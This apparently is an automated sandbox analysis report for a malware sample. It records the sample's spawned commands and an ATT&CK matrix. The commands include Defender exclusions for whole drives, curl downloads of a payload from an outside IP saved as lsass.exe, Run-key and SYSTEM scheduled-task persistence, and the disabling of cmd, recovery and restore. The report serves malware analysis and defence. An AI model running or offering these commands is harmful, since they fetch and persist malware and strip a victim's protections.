Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'D:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 8.8.8.8 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanelNamespace" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disable	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h ssh	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Local\Temp\lsass.exe "http://185.254.97.190:2024/download/XClient.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\lsass.exe lsass.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "winlogon" /tr "lsass.exe" /sc ONSTART /ru SYSTEM /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'D:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\lsass.exe lsass.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\appcompat\ssh" /deny user:F	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Code function: 0_2_00405573 GetVersionExW,GetVersionExW,

0_2_00405573

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Native API	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Obfuscated Files or Information	LSASS Memory	22 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	11 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 Modify Registry	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	3 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
